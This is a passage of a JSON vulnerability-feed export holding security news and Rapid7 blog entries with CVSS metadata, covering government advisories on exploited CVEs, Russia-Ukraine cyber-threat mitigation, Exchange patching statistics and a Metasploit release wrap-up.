their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized [SolarWinds Orion updates](<https://thehackernews.com/2021/12/solarwinds-hackers-targeting-government.html>) to breach the networks of U.S. government agencies.\n\nTo increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.\n\n\"Consider using a centralized patch management system,\" the advisory reads. \"For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.\"\n\nOther recommended best practices are as follows \u2014\n\n * Implement robust log collection and retention\n * Require accounts to have strong passwords\n * Enable strong spam filters to prevent phishing emails from reaching end-users\n * Implement rigorous configuration management programs\n * Disable all unnecessary ports and protocols\n * Ensure OT hardware is in read-only mode\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T09:14:00", "type": "thn", "title": "FBI, NSA and CISA Warns of Russian Hackers Targeting Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-01-12T10:47:49", "id": "THN:3E9680853FA3A677106A8ED8B7AACBE6", "href": "https://thehackernews.com/2022/01/fbi-nsa-and-cisa-warns-of-russian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core &amp; Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-02-25T03:28:00", "description": "\n\nNow that [Russia has begun its armed invasion of Ukraine](<https://www.axios.com/putin-delares-war-on-ukraine-5a28dbd5-362f-4e97-91e1-84272f7390fd.html>), we should expect increasing risks of cybersecurity attacks and incidents, either as spillover from cyberattacks targeting Ukraine or direct attacks against actors supporting Ukraine.\n\nAny state-sponsored Russian attacks aiming to support the Russian invasion of Ukraine, or to retaliate for US, NATO, or other foreign measures taken in response to the Russian invasion of Ukraine, are most likely to be destructive or disruptive in nature rather than aiming to steal data. This blog discusses the types of attacks organizations may see \u2014 including distributed denial of service (DDoS), website defacements, and the use of ransomware or destructive malware \u2014 and recommends steps for their mitigation or remediation. \n\nAs we have [stated](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>) before, we do not believe organizations need to panic. But as per guidance from numerous governments, we do believe it is wise to be extra vigilant at this time. Rapid7 will continue to monitor the cybersecurity risks, both internally and for our Managed Detection and Response (MDR) customers as the situation evolves. We will post updates as relevant and suggest subscription to our blog to see them as they are posted. \n\n\n## Malware\n\nOne of the most concerning possibilities is the risk of a destructive malware attack on the US, NATO members, or other foreign countries. This could take the form of a direct attack or spillover from an attack on Ukraine, such as the [2017 NotPetya operation that targeted Ukraine and spread to other parts of the globe](<https://www.rapid7.com/blog/post/2017/06/27/petya-ransomware-explained/>). Cybersecurity researchers have just discovered a new data wiping malware, dubbed HermeticWiper (AKA KillDisk.NCV), that infected hundreds of Ukrainian machines in the last two months. This seems to be a custom-written malware that corrupts the Master Boot Record (MBR), resulting in boot failure. This malware, like NotPetya, is intended to be destructive and will cripple the assets that it infects. \n\nAs always, the best malware prevention is to avoid infection in the first place \u2014 a risk we can minimize by ensuring that assets are up to date and use strong access controls, including multi-factor authentication. Additionally, it is crucial to have an incident response plan in place for the worst-case scenario, as well as a business continuity plan \u2014 including failover infrastructure if possible \u2014 for business-critical assets. \n\n\n## DDoS\n\nThere have already been [reports](<https://www.vice.com/en/article/v7dpbd/ukraines-military-banks-suffering-ddos-attacks>) of DDoS attacks on Ukrainian websites, and Russia has [historically](<https://cyberlaw.ccdcoe.org/wiki/Georgia-Russia_conflict_\\(2008\\)>) used DDoS in support of operations against other former Soviet republics, such as Georgia, in the past. Given this context, it is plausible that state-sponsored Russian actors would use DDoS if they choose to retaliate in response to measures taken against Russia for the invasion of Ukraine, such as sanctions or cyber operations from NATO countries. \n\nWhile DDoS does not receive the same level of attention as some other forms of attack, it can still have significant impacts to business operations. DDoS mitigations can include reduction of attack surface area via Content Distribution Networks or load balancers, as well as the use of Access Control Lists and firewalls to drop traffic coming from attacker nodes. \n\n\n## Phishing campaigns\n\nRussian state-sponsored actors are also well known for [engaging in spear-phishing attacks](<https://www.cisa.gov/uscert/ncas/alerts/TA18-074A>), specifically with compromised valid accounts. Defenders should ensure strong spam filtering and attachment scanning is in place. Educating end users of the dangers of phishing and regularly running phishing campaigns will also help mitigate this issue.\n\nState-sponsored, APT-style groups are not the only relevant threats. In times of crisis, it is common to see phishing attacks linking to malicious websites masquerading as news, aid groups, or other seemingly relevant content. Opportunistic scammers and other bad actors will attempt to take advantage of our human nature when curiosity, anxiety, and desire to help can make people less suspicious. Remain vigilant and avoid clicking unknown links or opening attachments \u2014 basic cyber hygiene that can be forgotten when emotions run high. \n\n\n## Brute-force attacks\n\n[According to a report from the NSA, CISA, FBI, and NCSC](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>), \u201cFrom mid-2019 through early 2021, Russian General Staff Main Intelligence Directorate (GRU) \u2026 conduct[ed] widespread, distributed, and anonymized brute-force access attempts against hundreds of government and private sector targets worldwide.\u201d GRU used the discovered credentials to gain access into networks and further used known vulnerabilities such as CVE-2020-0688 and CVE-2020-17144 to increase access.\n\nThe best mitigation for these types of attacks is to enable MFA on all systems. Minimize externally facing systems and ensure externally facing systems are fully patched. \n\n\n## Defacement\n\nUkraine has also been experiencing website defacements, which provide attackers with an opportunity to spread messaging. Website defacement is typically associated with hacktivist activity, but state-sponsored Russian actors could pose as hacktivists in order to disguise Russian state involvement, and spread their strategic communication themes to international audiences by defacing Western websites. \n\nWebsite defacement often occurs as a result of weak passwords for admin accounts, cross-site scripting, injection, file upload, or vulnerable plugins. This can be managed by limiting the level of access accounts have and enforcing strong passwords. Additionally, looking for places where scripts or iframes could be injected or where SQL injection could occur can help identify vulnerabilities to remediate. \n\n\n## Ransomware\n\nRansomware could also be used to disrupt foreign targets. Criminals based in Russia were [believed](<https://thehill.com/homenews/administration/589850-biden-administration-says-russia-arrested-colonial-pipeline-hacker>) to be behind the 2021 ransomware attack on Colonial Pipeline in the United States. Ransomware can have disruptive effects on targets, and the attackers could simply refrain from decrypting files, even if they receive ransom payments, in order to maximize and extend the disruptive impact on victims. Additionally, opportunistic attackers who are actually looking for ransoms will still be on the prowl, and are likely to take advantage of the chaos. \n\nTo this end, defenders should:\n\n * Evaluate asset and application configurations to ensure resilience\n * Double-check visibility into the functioning of business-critical assets\n * Assess incident response processes in the case of an incident \n\n\n## What else should you be doing?\n\nThe following activities are mission-critical in times of uncertainty, but they are also best practices in general.\n\n * **Continuous monitoring: **Reinforce cybersecurity measures and staff during nights, weekends, and holidays. Threat actors are known to target their victims when there are gaps in \u201ceyes on glass.\u201d\n * **Incident response plan:** Prepare a dedicated team with a detailed workflow and a contact person that will be available offline in case of a cybersecurity incident.\n * **Back up data:** Implement data backup procedures of the company networks and systems. Backup procedures should be conducted on a frequent, regular basis for immediate recovery. Also, be sure to store backups offline and check them regularly to ensure they have not been poisoned with malware.\n * **Reduce opportunities for attackers: **Identify exposures, vulnerabilities, and misconfigurations that can provide opportunities for attackers to gain a foothold in your environment, and apply relevant mitigations or patches. In particular, Russian operators are well known to exploit edge systems. The Cybersecurity and Infrastructure Security Agency (CISA) [recently put out an alert](<https://www.cisa.gov/uscert/ncas/alerts/aa22-011a>) listing 13 known vulnerabilities that Russian state-sponsored threat actors use to initially compromise networks. We recommend this as a starting point for focused patching and mitigation.\n * **Stay informed:** Follow the latest updates and recommendations provided by Rapid7, as well as governmental security entities in specific press releases/alerts from the [Ukraine CERT](<https://cert.gov.ua/>), [The Security Service of Ukraine (SSU)](<https://ssu.gov.ua/en>), and the [US CISA](<https://www.cisa.gov/uscert>).\n\nWe expect the situation to be fluid over the coming days and weeks, and security guidance and threats may also evolve as the conflict develops. The measures suggested in this blog will continue to be relevant, and we plan to provide additional information as needed. \n\nIn the meantime, you can also [check this blog](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>) to see how Rapid7 can help you prepare for and respond to cyber attacks. We also recommend organizations check their government\u2019s cybersecurity website for guidance.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-25T01:31:27", "type": "rapid7blog", "title": "Staying Secure in a Global Cyber Conflict", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-17144"], "modified": "2022-02-25T01:31:27", "id": "RAPID7BLOG:CBD7A5DA1DAAE9DCFD01F104F4B1B5FB", "href": "https://blog.rapid7.com/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-09-29T16:39:11", "description": "\n\nToday's topic is Exchange 2010, which reaches end of support (EoS) on Oct. 13, 2020, as well as a survey of other versions of Exchange and how well they are being kept up-to-date. During our work with [Project Sonar](<https://www.rapid7.com/research/project-sonar/>), we consistently see the use of old and EoS software on the internet. This is generally a cause for concern, because this typically means that vulnerabilities will not be fixed. It is also an indicator that the environment the software is running in has other security issues.\n\nThe key takeaways from this post are:\n\n * Organizations running Exchange 2010 and earlier should upgrade to supported technology as soon as possible.\n * Organizations running Exchange 2013 should begin planning to upgrade to newer technologies.\n * Statistically speaking, most organizations running any version of Exchange are missing updates for critical vulnerabilities.\n\nBefore I move on, I want to point out that our numbers here will be fairly accurate, but not perfect. This is due to a couple of factors: First, the method that we use to fingerprint Exchange OWA allows us to determine the Exchange version down to `<major version>.<minor version>.<build number>`, but we cannot see the revision. For example, for Exchange Server 2019 Cumulative Update (CU) 7, with the latest updates the build number is `15.2.721.2`, but we only see `15.2.721`. This means that we can tell that the server is running 2019 CU7, but we can't be sure whether this month's patches were installed. Second, and most frustrating, is that Microsoft's updates don't always adjust the version number shown by tooling. Even Microsoft's own Exchange Admin Center and `Get-ExchangeServer` command will report incorrect versions in many instances.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n## Exchange 2010: A decade of support ends\n\nJust under 11 years ago, Microsoft released Exchange 2010. On Tuesday, Oct. 13, 2020, Microsoft Exchange 2010 will reach [End of Support (EoS) status](<https://techcommunity.microsoft.com/t5/exchange-team-blog/microsoft-extending-end-of-support-for-exchange-server-2010-to/ba-p/753591>). Microsoft will not provide **any** updates, including security fixes, after this date. While the software will keep working after this date, a quick glance at the Exchange vulnerabilities announced in 2020 will quickly show the importance of security updates.\n\nIn March 2020, we used Project Sonar to measure the number of Exchange servers that might be vulnerable to [CVE-2020-0688](<https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/>). At that time, we found over 166,000 Exchange 2010 servers with internet-facing Outlook Web App (OWA) services. On Monday, Sept. 21, 2020, we looked again and found that while the numbers had decreased, there are still 139,771 OWA services.\n\n\n\nThat's a scary number of servers that will not receive security updates for any future vulnerabilities. Both scary and disappointing is the fact that 40,000 of these were already running unsupported versions of Exchange 2010. Nearly 54,000 of these have not been updated in six years!\n\n## Exchange 2007: Long past its expiration date\n\nSpeaking of software that hasn't seen updates in years, there are 16,577 Exchange 2007 servers with OWA on the public internet. This product has been out of support for over three years. Additionally, the newest version of Windows Server that Exchange 2007 runs on is Windows Server 2008 R2, which reached EoS in January 2020. In summary, this is a business-critical application running in an environment in which vulnerabilities will not be fixed.\n\n\n\n## Exchange 2013: The twilight years\n\nExchange 2013 transitioned to Extended Support in 2018 and will cease to be supported at all on April 11, 2023. Additionally, the newest version of Windows Server that Exchange 2013 runs on is Windows Server 2012 R2, [which reaches EoS on Oct. 10, 2023](<https://docs.microsoft.com/en-us/lifecycle/products/windows-server-2012-r2>). In short, the full Exchange 2013 environment, other than AD, will be **completely unsupported** in less than three years.\n\nOur Project Sonar metrics for OWA show that there are at least 102,593 Exchange 2013 servers on the public internet. Further, 67,567 (~66%) are not running a version of Exchange that Microsoft considers &quot;Supported.&quot;\n\n\n\nGiven that Exchange is typically considered a business-critical application, and how complex an upgrade can be, we strongly recommend that organizations running Exchange 2013 start planning the upgrade process and timeline. The \n&quot;Upgrading considerations&quot; portion of the &quot;Taking actions&quot; section at the end of the blog post calls out a few of the considerations that might make this process time-consuming or challenging.\n\n## Exchange 2016 and 2019: Newer, but still vulnerable\n\nWhile Exchange 2016 and 2019 will be supported for some time to come, organizations running them appear to be doing a poor job of keeping their environments up-to-date.\n\nOf the ~138,000 Exchange 2016 servers, 87% were missing the most recent updates.\n\n\n\nSimilarly, 77% of the ~25,000 Exchange 2019 servers we observed were missing updates. There are nearly 2,100 that, as far as we can tell, have _never_ had updates installed.\n\n\n\n## Taking action\n\nGiven the potential risks that a compromised Exchange environment present, we have the following recommendations:\n\n * Organizations using Exchange 2010 or earlier should aggressively pursue upgrading their environment to supported technologies.\n * Organizations using Exchange 2013 should ensure they have a plan and timeline for upgrading to supported technologies by April 11, 2023. Remember that the most modern version of Windows Server that 2013 supports is also going EoS that year, so the process may introduce new server OSes into the environment as well. Please see the &quot;Upgrading considerations&quot; section below for some of the challenges that may need to be accounted for.\n * Organizations using Exchange 2016 or on-premises 2019 should ensure their Exchange environment is currently up-to-date and that there is a plan and process for keeping it updated.\n * Organizations using Exchange hosted by a non-Microsoft vendor should ensure the vendor has a plan and process for keeping the software up-to-date. They should also verify this is being done and hold the vendor accountable if not.\n * Leverage [vulnerability management tools](<https://www.rapid7.com/products/insightvm/>) and other types of tools to detect when Exchange environments are missing updates. They will be particularly helpful when Exchange version numbers cannot be reliably determined.\n\n### Upgrading considerations\n\nUpgrading an Exchange environment is a very complex task that is compounded by the server and client dependencies. This is why planning in advances is critical. Here are some examples of some issues organizations may run into when planning an upgrade:\n\n * **Upgrading from Exchange 2010:** There is no direct upgrade path from Exchange 2010 to Exchange 2019. Organizations will need to upgrade to Exchange 2013 or 2016 first.\n * **Active Directory (AD) server OS:** Exchange 2019 doesn't support Windows Server 2012 AD servers and requires the AD forest functional level to be at least 2012 R2.\n * **TLS:** Exchange 2019, by default, requires TLS 1.2. This means that clients will need to support TLS 1.2, or other workarounds will need to be implemented in order to support legacy clients.\n * **Outlook compatibility:** Exchange 2019 requires at least Outlook 2013 with the most recent updates. Keep in mind that Outlook 2013 goes EoS April 11, 2023, so those leveraging it should upgrade to Outlook 2016 or higher.\n * **Unified Messaging (UM):** UM was removed in Exchange 2019\n * **Web browser compatibility:** Exchange 2019 doesn't support Internet Explorer 10 or lower.\n\n#### Assess Your Environment for Microsoft Exchange Vulnerabilities and Take Action\n\n[Get Started](<https://www.rapid7.com/trial/insightvm/>)", "cvss3": {}, "published": "2020-09-29T16:05:16", "type": "rapid7blog", "title": "Microsoft Exchange 2010 End of Support and Overall Patching Study", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2020-09-29T16:05:16", "id": "RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85", "href": "https://blog.rapid7.com/2020/09/29/microsoft-exchange-2010-end-of-support-and-overall-patching-study/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T20:40:17", "description": "## SAP Internet Graphics Server (IGS)\n\n\n\nThis week includes a new module targeting the SAP Internet Graphics Server application, contributed by community member [Vladimir Ivanov](<https://github.com/Vladimir-Ivanov-Git>). This particular module covers two CVEs that are both XML External Entity (XXE) bugs that are remotely exploitable. The module comes fully featured with the ability to check for the presence of the vulnerabilities as well as two methods to leverage them. The first is a read action that allows users to read files from the remote server, while the second can be used to trigger a denial of service (DoS) condition.\n\n## Just read the (new Zerologon) docs\n\nThe module documentation for the Zerologon ([CVE-2020-1472](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?referrer=wrapup>)) module has been updated with details of how to run the entire attack workflow through Metasploit. This specifically included leveraging the new `auxiliary/gather/windows_secrets_dump` which can recover the machine password to restore on the targeted Domain Controller and using the PSexec module to execute a payload. It\u2019s important to restore the machine account password to prevent services from breaking. Module documentation can be accessed from msfconsole by using the `info -d` command. The most recent Metasploit Demo meeting also covered this content, [showing](<https://www.youtube.com/watch?v=Z5oQmHVsqjA&t=1648>) the newly documented workflow in action.\n\n## New modules (1)\n\n * [SAP Internet Graphics Server (IGS) XMLCHART XXE](<https://github.com/rapid7/metasploit-framework/pull/14163>) by Vladimir Ivanov and Yvan Genuer, which exploits [CVE-2018-2393](<https://attackerkb.com/topics/EmAs1SnpOK/cve-2018-2393?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Update sap_service_discovery.rb to support discovering SAP IGS servers](<https://github.com/rapid7/metasploit-framework/pull/14238>) by Vladimir Ivanov\n * [Tab-completion improved for module OPTIONS not available](<https://github.com/rapid7/metasploit-framework/pull/14070>) by mariabelenTC\n * [Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates](<https://github.com/rapid7/metasploit-framework/pull/14213>) by Alan David Foster\n * [Add the DOMAIN option to the CVE-2020-0688 Exploit](<https://github.com/rapid7/metasploit-framework/pull/14190>) by Spencer McIntyre\n * [Update the module docs for CVE-2020-1472 (Zerologon)](<https://github.com/rapid7/metasploit-framework/pull/14204>) by Spencer McIntyre\n\n## Bugs fixed\n\n * [Fix msf6 TLV_TYPE_PIVOT_STAGE_DATA_SIZE pivoting error](<https://github.com/rapid7/metasploit-framework/pull/14028>) by Alan David Foster\n * [Always show module actions within the info command](<https://github.com/rapid7/metasploit-framework/pull/14233>) by Alan David Foster\n * [Remove modules whose deprecation date has passed](<https://github.com/rapid7/metasploit-framework/pull/14242>) by Spencer McIntyre\n * [Convert myworkspace.id to myworkspace_id for no db compat](<https://github.com/rapid7/metasploit-framework/pull/14226>) by h00die\n * [Disconnect the named pipe and break after the impersonation callback](<https://github.com/rapid7/metasploit-payloads/pull/438>) by Spencer McIntyre\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.9...6.0.10](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-01T17%3A52%3A23%2B01%3A00..2020-10-08T11%3A41%3A44-05%3A00%22>)\n * [Full diff 6.0.9...6.0.10](<https://github.com/rapid7/metasploit-framework/compare/6.0.9...6.0.10>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-10-09T19:41:47", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-2393", "CVE-2020-0688", 